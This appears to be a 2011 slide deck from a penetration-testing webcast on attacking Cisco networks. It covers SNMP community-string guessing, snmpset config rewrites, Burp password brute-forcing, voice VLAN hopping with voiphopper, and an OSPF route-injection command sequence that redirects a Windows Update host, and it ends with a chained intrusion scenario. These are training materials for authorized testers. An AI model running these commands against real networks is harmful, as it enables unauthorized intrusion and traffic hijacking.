Pen Test Perfect Storm Part 2

The Pen Test Perfect Storm:
We Love Cisco!
Pen Test Techniques – Part 6
By Joshua Wright, Kevin Johnson,
& Ed Skoudis
Hosted by Melissa England of Core
Copyright 2011, All Rights Reserved
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
1
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
2
Previously on
Firefly…
• To recap, in Parts 1-3 of this trilogy, we discussed how
penetration tests and testers are categorized:
1) Network tests 2) Web application tests 3) Wireless tests
4) Others, but those are the biggies…
• In Parts 4 and 5 of the Trilogy, we focused on applying
these techniques to Microsoft and Adobe products,
respectively
• We also proposed that…
• …if you want to be a great pen tester…
• …make sure you can pivot between network pen tests, web
app tests, and wireless pen tests
– Furthermore, integrate these attack vectors together into a much
more powerful combined attack
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
3
Today's Focus
• Continue the concept of combined testing,
focusing on the great features of Cisco products
– Also, many techniques we'll cover are applicable to
other network device manufacturers
• To illustrate the pragmatic and iterative nature
of combined tests, we'll alter the order this
time:
1) Network exploitation
2) Web App attack
3) Wireless attack… and then more network (because
we can)!
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
4
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
5
SNMP Community String
Enumeration
• To manipulate target network devices managed via SNMP, we
could attempt to determine community strings
– Sniff SNMPv1 or SNMPv2c clear text
– You'd be a fool not to sniff traffic and look for UDP 161 just in case
some SNMP traffic leaks to client or servers you control
– Also, try community string guessing attacks against SNMPv1, v2c, or v3
• Determining SNMP Read is nice… Read/Write is awesome
• Numerous tools available for automated community string
guessing
– Can be relatively quick, since it is just UDP
– Some organizations use trivial community strings
public?
private?
snmp?
snmp…Oui!*
*I am not sure why,
but, in my head, all
routers speak with
sexy French accents.
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
6
Tools for SNMP Community
String Automated Guessing
• Onesixtyone by Solar Eclipse
– Free at www.phreedom.org/solar/onesixtyone/
– Speedy – Sends lots of requests in parallel, not waiting for responses
– Doesn't stop on success – enumerates all valid community strings for a
device
– Good for large-scale iteration through network address space
– dict.txt includes 49 common strings
• Free Metasploit module: auxiliary/scanner/snmp/community
– Nice, flexible RHOSTS options (range, list, file, IPv6, etc.)
– Stops once it gets a success on a given target (maybe just Read)
– Includes snmp.txt file with 119 common strings
• Core IMPACT
– Integration with flexible IMPACT user interface
– Useful for pivoting through conquered devices
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
7
Using SNMP R and RW Access
• If you achieve SNMP Read/Write access, you own the
device
– We can download running or startup config for detailed analysis
– Crack the passwords for it and use them on other network devices
• Cisco enable passwords are typically stored using salted MD5, easily cracked
using John or oclHashcat
– We could dump CDP, ARP cache, and routing table for target
enumeration
– We could reconfigure the device to allow all sorts of access, such as
telnet, ssh, http, or https
– Once we get telnet or ssh access, Core IMPACT provides a virtual
agent for control
• Unlike traditional Core agents, code doesn't run on target Cisco device…
instead, it controls the target across the network
• We can then pivot through the device easily using the Core GUI
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
8
From SNMP To SSH or HTTPS
• We could use SNMP RW to enable telnet, ssh, http, or
https as follows:
– Use snmpblow.pl (free at
www.scanit.be/en_US/snmpblow.html) to make router push
configuration to our tftp server
– Use snmpwalk (part of net-snmp-utils) to look at SNMP MIBs
on the device and determine which ones are associated with
updating the configuration
– Edit downloaded configuration, adding whatever you'd like:
• ip http secure-server
• transport input ssh
– Put modified config on our own tftp server
– Use snmpset to force
it to update the configuration
$ snmpset –v2c –c <commstring> <routerIP>
<MIB>.<tftpIP> s "<config.file>"
Edit
config:
transport
input ssh
Oui!
Oui!
My
TFTP
TFTP config, new
pour
me
config
vous
your
from
config,
me
babe
• Be careful! You should get explicit permission, and
choose a less-important network device
– Perhaps an example set up just for demonstration purposes
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
9
Manipulating Switches to
Create SPAN ports
• If you are able to compromise a network
switch (again, via SNMP RW, telnet, ssh,
or other method), you could reconfigure
it to mirror ports or entire VLANs
– Or reconfigure VLANs
• Nice for sniffing, even in an environment
with Dynamic ARP inspection and other
anti-sniffing defenses
• When you control the network
infrastructure, you wield great power
over the target environment
– But with great power comes great
responsibility
Make
this
port
a span
port!
Like,
totally,
dude!!*
*Inside my head, all switches
speak with a California
surfer-dude accent.
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
10
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
11
Fingerprinting Network
Devices with Yokoso!
• Most, if not all Cisco devices and systems have web interfaces to target
– If discovered, these allow for various attack opportunities
• Yokoso is a collection of web interface fingerprints based on application
resources
• Fingerprints are the URIs of unique resources
– Resources within the administration interfaces
– Unique files (e.g., page, image name, style sheet, etc.) that identify the
system/software
• Project lead by Kevin Johnson, Frank DiMaggio, and Justin Searle
– http://yokoso.secureideas.net
• Penetration testers can use these fingerprints within XSS attacks or
within other attack scripts
• They fulfill two purposes:
– Infrastructure discovery
– Browser history harvesting
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
12
Brute-Forcing Accounts via
Password Guessing
• As we saw earlier with SNMP community strings, brute
forcing accounts is a common attack
– Surprising how many pen testers don't use it
• With care, brute force attacks can gain us access to web
administration interfaces
– We can administer the infrastructure!
• Two pieces are needed:
– User and password dictionaries
– Brute force tool or script
• Phenoelit provides a list of common default
username/password combos
– http://www.phenoelit-us.org/dpl/dpl.html
• Burp Suite includes an excellent HTTP brute forcer
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
13
Burp Suite
•
I get asked often which proxy is my favorite one
– Josh has asked me at least 4 times!?!?
•
Burp Suite is a very powerful suite of tools
– Available from http://portswigger.net
•
Provides low-level access to the HTTP protocol
– Burp allows us to modify requests and responses, but does not break things out in
the user friendly way WebScarab does
•
Requires deeper knowledge of HTTP than other similar tools
– It uses a proxy as the core to feed the tool information
– We need to understand the protocol to know how to abuse it
•
When we find web interfaces, such as Cisco ones, we browse them through
Burp
– This allows us to look for flaws or attack the system
•
Burp has two versions: free and professional edition
– What we want to accomplish next is available in both
– The free version does throttle Intruder, the tool we will use
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
14
Password Enumeration with
Burp Intruder
•
Intruder is my brute forcer of choice
•
We feed the Cisco interface
authentication request through the proxy
– Great fuzzing tool
– We need to ensure we actually submit the
credentials 
•
•
Marking the request parameters for brute
forcing
– Since this example uses HTTP Basic auth,
we need to create some rules
– These rules format the parameter
correctly
A password dictionary is selected in the
payload tab
–
•
Encoded
authentication
This tab is where we set the mangle rules for
the parameter
In the results we look for a response
that's different
– Typically by receiving a response with a
different size
Rules to
format
parameter
correctly
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
15
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
16
Cisco Wireless LAN Controller
as an Attack Target
• Popular attack target
– 2007: 8 flaws from XSS to authentication bypass,
undocumented static admin username/password
– 2008: A quiet year for WLC vulnerabilities
– 2009: 9 flaws including SQL injection, ACL evasion,
DoS, unauthorized remote configuration change
– 2010: 7 flaws including authentication bypass
• Common language in CVE filings:
– "via unspecified vectors", "unspecified vulnerability",
"via unspecified network traffic“
– <insert snarky comment here>
• Supporting infrastructure also a target
– Cisco ACS EAP/TLS bypass vulnerability, buffer
overflows in malformed EAP traffic, etc.
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
17
Cisco WLCCP Wireless Capture
Sent in plaintext (including the
WLC IP address) even when WLAN
is encrypted! Also seems like a
good fuzzing target, IMHO.
IOS Version Also
Disclosed, not
interpreted by
Wireshark
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
18
interface FastEthernet0/2
switchport access vlan 100
switchport mode access
switchport voice vlan 200
Voice VLAN Hopping
• Cisco switches accommodate a special
"voice VLAN" feature
– VoIP phone plugs into switch, PC plugs
into VoIP phone
– Switch must trunk two VLANs
• Attacker can identify VLAN number
used for voice by observing CDP traffic
• Despite port configured as access,
attacker can create 802.1Q trunk
– Access to voice VLAN
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
19
voiphopper
voiphopper.sf.net
• Automates voice VLAN hopping attack
–
–
–
–
Written by Jason Ostrom
Listens for CDP to extract voice VLAN#
Creates interface, requests DHCP address
Must boot Linux natively, not as a Windows guest
• Includes attack options for Cisco, Avaya and Nortel
switches
# ./voiphopper -c 0 -i eth0
VoIP Hopper 1.00 Running in CDP Sniff Mode
Capturing CDP Packets on eth0
Captured IEEE 802.3, CDP Packet of 371 bytes
Discovered VoIP VLAN: 200
Added VLAN 200 to Interface eth0
Current MAC: 00:10:c6:ce:f2:ab
Attempting dhcp request for new interface eth0.200
VoIP Hopper dhcp client: received IP address for eth0.200: 10.10.200.2
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
20
Establishing a Virtual IOS Lab
• IOS emulators have gone from "simulators" to full
IOS VMs
• Dynamips – Free Cisco 7200/3600/3700/2600
series router emulator
– Supports multi-port virtual switching network module
hardware as well
• Dynagen - CLI front-end for Dynamips
• GNS3 - GUI front-end that bundles Dynamips,
Dynagen, and Qemu
• Available for Windows or Linux
Create a virtual router environment for testing, or as
an attack platform
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
21
GNS3 Example
You must supply the device
image file for each device!
Simple install and configuration process: www.gns3.net/download
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
22
Cisco Router as an Attack Tool
• As a pen tester, create and keep a VM
of a "Cisco router" (Dynagen)
• Useful to become part of the internal
network infrastructure
– Joining OSPF or other IGP routing
topologies
• Opportunity to inject malicious routes
inside an organization
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
23
Unauthenticated
OSPF Traffic FTW!
Use This With Extreme Caution!
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
24
Post-Routing Participation
Commands
• Useful Information Collection Commands
router#
router#
router#
router#
show
show
show
show
ip route
ip rip database
ip ospf neighbors
cdp neighbor
• Inject IGP Routes for Hosts On the Internet, Redirecting to Your Attack System
router(config)# interface FastEthernet0/1
router(config-if)# desc This is the network for
download.windowsupdate.com
router(config-if)# ip address 70.37.129.70 255.255.255.0
router(config-if)# router ospf 1
router(config)# network 70.37.129.0 0.0.0.255
Did we mention that this should be used with EXTREME CAUTION?
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
25
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
26
Scenario: An Intranet Pen Test:
Let's Gather Some Info
Wireless
LAN
Controller
AP
Target
Network
Pen tester runs wireless
sniffer in monitor mode.
Gathers info about EAP
type. Sees WLCCP traffic
and EAP-Fast… A Cisco
environment! Also
discovers IP of WLC.
1
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
27
Scenario:
Connect to Restricted VLAN
Wireless
LAN
Controller
AP
Target
Network
Pen tester connects to
Restricted Guest VLAN.
2
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
28
Scenario:
VLAN Hopping
Wireless
LAN
Controller
AP
Target
Network
Pen tester sniffs CDP,
identifies voice VLAN
number, and creates
802.1Q trunk using
voiphopper, resulting
in VLAN hopping.
3
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
29
Scenario: SNMP Community
String Enumeration
Wireless
LAN
Controller
AP
Pen tester discovers
limited intranet
accessibility through
voice VLAN.
Pen tester launches
community string
guessing attack against
router… RW success!
Target
Network
4
5
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
30
Scenario:
Alter Router Config – ACL Tweak
Wireless
LAN
Controller
AP
Target
Network
With SNMP RW, pen tester
causes router to update
config, altering ACL that
limited VoIP LAN so pen
tester's IP address has
unfettered access to
intranet.
6
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
31
Scenario:
Access WLAN Controller
Wireless
LAN
Controller
AP
Target
Network
Pen tester accesses
Wireless LAN Controller
based on IP address
discovered in Step 1.
7
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
32
Scenario:
Burp to Enumerate WLC Passwords
Wireless
LAN
Controller
AP
Target
Network
Pen tester uses Burp to
enumerate passwords on
WLC, gaining access to
administrative console of
wireless infrastructure.
8
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
33
Scenario:
Add New Virtual SSID to AP
Wireless
LAN
Controller
AP
Target
Network
Pen tester uses WLC to
reconfigure access point,
adding a new virtual SSID
with access to pen tester
chosen VLANs on the
enterprise network (a.k.a.
"Ghost in the AP")
9
Pen
Tester
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
34
Scenario:
Unfettered Intranet Access!
Wireless
LAN
Controller
Pen
Tester
AP
10
Pen tester now has
unfettered access to
intranet… Game Over.
Target
Network
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
35
Outline
• The Power of Combined Attacks
• Web App Attack Tools and Techniques
• Network Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
36
Conclusions
• Combined attack vectors allow for far deeper penetration
into most target networks than separate vectors allow
• Combined pen testing more accurately reflects an
attacker's ability to exploit the network and systems
• Network-centric capabilities create attacker opportunities
• We've looked at useful features of Core IMPACT, free
Metasploit, SNMP tools, Yokoso!, Dynamips, and much
more
– Integrating these tools for powerful attacks beyond each tool's
individual capabilities
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
37
Upcoming In-Depth
SANS Pen Test Courses
• SANS 560: Network Pen Testing and Ethical Hacking
–
–
–
–
Columbus, Ohio, April 11: Crowley
Amsterdam, Netherlands, May 9: Sims
Baltimore, June 15: Galbraith
Wash DC, July 17: Skoudis
• SANS 542: Web App Pen Testing and Ethical Hacking
–
–
–
–
San Diego, CA, May 5: Johnson
vLive, May 16: Johnson & Misenar
London, June 6: Shackleford
Wash DC, July 17: Johnson
• SANS 617:Wireless Ethical Hacking, Pen Testing, & Defenses
–
–
–
–
vLive, April 19: Wright
Victoria, BC, May 9: Pesce
Amsterdam, Netherlands, May 16: Armstrong
Wash DC, July 17: Wright
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
38
New! SANS Security 660
•
•
•
•
•
•
Advanced Penetration Testing course
By Wright, Galbraith, and Sims
Reston, VA, April 16: Strand
Amsterdam, Netherlands, May 16: Sims
Washington DC, July 17: Sims
vLive, August 30: Sims, Wright,
Galbraith!!!
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
39
Thank You &
Behind the Scenes
• We'd like to offer a special thank you to
the staff of Core for helping to make
this "trilogy" of webcasts possible:
– Mike Yaffe
– Alex Horan
– Melissa England
– Selena Proctor
– Chris Burd
– And the rest of
the gang!
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
40
Pen Test Perfect Storm Trilogy…
Part 6
The End
?
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
41